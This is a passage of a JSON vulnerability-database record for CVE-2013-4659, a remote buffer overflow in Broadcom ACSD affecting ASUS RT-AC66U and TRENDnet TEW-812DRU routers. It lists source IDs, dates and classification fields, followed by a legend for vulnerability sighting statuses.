"db": "VULHUB",
"id": "VHN-64661"
},
{
"date": "2017-03-15T00:00:00",
"db": "VULMON",
"id": "CVE-2013-4659"
},
{
"date": "2013-07-31T12:25:00",
"db": "BID",
"id": "61499"
},
{
"date": "2017-04-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-006764"
},
{
"date": "2017-03-15T16:58:34.110000",
"db": "NVD",
"id": "CVE-2013-4659"
},
{
"date": "2017-03-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-627"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "122562"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-627"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS RT-AC66U and TRENDnet TEW-812DRU Used by multiple vendor routers including Broadcom ACSD Vulnerable to buffer overflow",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006764"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201307-627"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…